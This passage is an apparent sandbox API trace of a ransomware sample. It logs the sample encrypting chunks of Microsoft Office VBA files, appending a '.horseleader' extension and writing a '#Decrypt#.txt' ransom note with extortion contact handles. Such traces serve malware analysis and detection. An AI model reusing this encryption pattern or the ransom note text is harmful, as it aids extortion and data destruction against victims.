(lpFirst="VBLR6.CHM", lpSrch=".horseleader") returned 0x0 [0250.380] lstrcmpW (lpString1="VBLR6.CHM", lpString2="#Decrypt#.txt") returned 1 [0250.380] lstrcmpW (lpString1="VBLR6.CHM", lpString2="_uninstalling_.png") returned 1 [0250.380] lstrlenW (lpString=".testttjffg") returned 11 [0250.380] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM", lpSrch=".testttjffg") returned 0x0 [0250.380] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.380] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.380] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.381] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 74 [0250.381] StrStrW (lpFirst="VBLR6.CHM", lpSrch=".txt") returned 0x0 [0250.381] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=944994) returned 1 [0250.381] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.381] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.383] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.383] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.384] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x70db1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.384] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.387] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.387] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.387] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xe1b62, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.387] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.389] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.389] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.390] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.390] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.390] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.390] CloseHandle (hObject=0x15c) returned 1 [0250.403] GetProcessHeap () returned 0x780000 [0250.403] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.403] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.horseleader") returned 86 [0250.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm.horseleader")) returned 1 [0250.404] GetProcessHeap () returned 0x780000 [0250.404] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.404] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9896ac00, ftCreationTime.dwHighDateTime=0x1c685f9, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x9896ac00, ftLastWriteTime.dwHighDateTime=0x1c685f9, nFileSizeHigh=0x0, nFileSizeLow=0x1e434, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="VBOB6.CHM", cAlternateFileName="")) returned 1 [0250.404] lstrcmpiW (lpString1="VBOB6.CHM", lpString2="Windows") returned -1 [0250.404] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 74 [0250.404] StrStrIW (lpFirst="VBOB6.CHM", lpSrch=".horseleader") returned 0x0 [0250.404] lstrcmpW (lpString1="VBOB6.CHM", lpString2="#Decrypt#.txt") returned 1 [0250.404] lstrcmpW (lpString1="VBOB6.CHM", lpString2="_uninstalling_.png") returned 1 [0250.404] lstrlenW (lpString=".testttjffg") returned 11 [0250.404] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM", lpSrch=".testttjffg") returned 0x0 [0250.404] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.404] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.405] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.405] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 74 [0250.405] StrStrW (lpFirst="VBOB6.CHM", lpSrch=".txt") returned 0x0 [0250.405] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=123956) returned 1 [0250.405] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.406] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.412] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.412] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.412] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xca1a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.412] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.412] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.413] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.413] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x19434, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.413] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.413] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.413] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.413] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.414] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.414] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.414] CloseHandle (hObject=0x15c) returned 1 [0250.414] GetProcessHeap () returned 0x780000 [0250.414] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.414] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.horseleader") returned 86 [0250.414] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm.horseleader")) returned 1 [0250.415] GetProcessHeap () returned 0x780000 [0250.415] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.415] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0eee700, ftCreationTime.dwHighDateTime=0x1c685f9, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa0eee700, ftLastWriteTime.dwHighDateTime=0x1c685f9, nFileSizeHigh=0x0, nFileSizeLow=0x65c96, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="VBUI6.CHM", cAlternateFileName="")) returned 1 [0250.415] lstrcmpiW (lpString1="VBUI6.CHM", lpString2="Windows") returned -1 [0250.415] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 74 [0250.415] StrStrIW (lpFirst="VBUI6.CHM", lpSrch=".horseleader") returned 0x0 [0250.415] lstrcmpW (lpString1="VBUI6.CHM", lpString2="#Decrypt#.txt") returned 1 [0250.415] lstrcmpW (lpString1="VBUI6.CHM", lpString2="_uninstalling_.png") returned 1 [0250.415] lstrlenW (lpString=".testttjffg") returned 11 [0250.415] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM", lpSrch=".testttjffg") returned 0x0 [0250.415] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.416] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.416] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.417] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 74 [0250.417] StrStrW (lpFirst="VBUI6.CHM", lpSrch=".txt") returned 0x0 [0250.417] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=416918) returned 1 [0250.417] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.417] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.419] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.419] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.420] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x3064b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.420] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.422] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.422] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.422] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x60c96, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.422] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.424] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.425] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.425] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.425] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.425] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.425] CloseHandle (hObject=0x15c) returned 1 [0250.425] GetProcessHeap () returned 0x780000 [0250.425] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.425] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.horseleader") returned 86 [0250.426] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm.horseleader")) returned 1 [0250.427] GetProcessHeap () returned 0x780000 [0250.427] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.427] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0eee700, ftCreationTime.dwHighDateTime=0x1c685f9, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa0eee700, ftLastWriteTime.dwHighDateTime=0x1c685f9, nFileSizeHigh=0x0, nFileSizeLow=0x65c96, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="VBUI6.CHM", cAlternateFileName="")) returned 0 [0250.427] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0250.427] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\#Decrypt#.txt") returned 78 [0250.427] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.428] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.428] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0250.429] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.429] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0250.429] CloseHandle (hObject=0x1a4) returned 1 [0250.429] GetProcessHeap () returned 0x780000 [0250.429] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.429] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56d3ae00, ftCreationTime.dwHighDateTime=0x1cbc41d, ftLastAccessTime.dwLowDateTime=0xe2340dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x56d3ae00, ftLastWriteTime.dwHighDateTime=0x1cbc41d, nFileSizeHigh=0x0, nFileSizeLow=0x381748, dwReserved0=0xe2160207, dwReserved1=0x6ae8d8f4, cFileName="VBE7.DLL", cAlternateFileName="")) returned 1 [0250.429] lstrcmpiW (lpString1="VBE7.DLL", lpString2="Windows") returned -1 [0250.429] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL") returned 68 [0250.429] StrStrIW (lpFirst="VBE7.DLL", lpSrch=".horseleader") returned 0x0 [0250.429] lstrcmpW (lpString1="VBE7.DLL", lpString2="#Decrypt#.txt") returned 1 [0250.429] lstrcmpW (lpString1="VBE7.DLL", lpString2="_uninstalling_.png") returned 1 [0250.430] lstrlenW (lpString=".testttjffg") returned 11 [0250.430] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL", lpSrch=".testttjffg") returned 0x0 [0250.430] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.430] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.430] 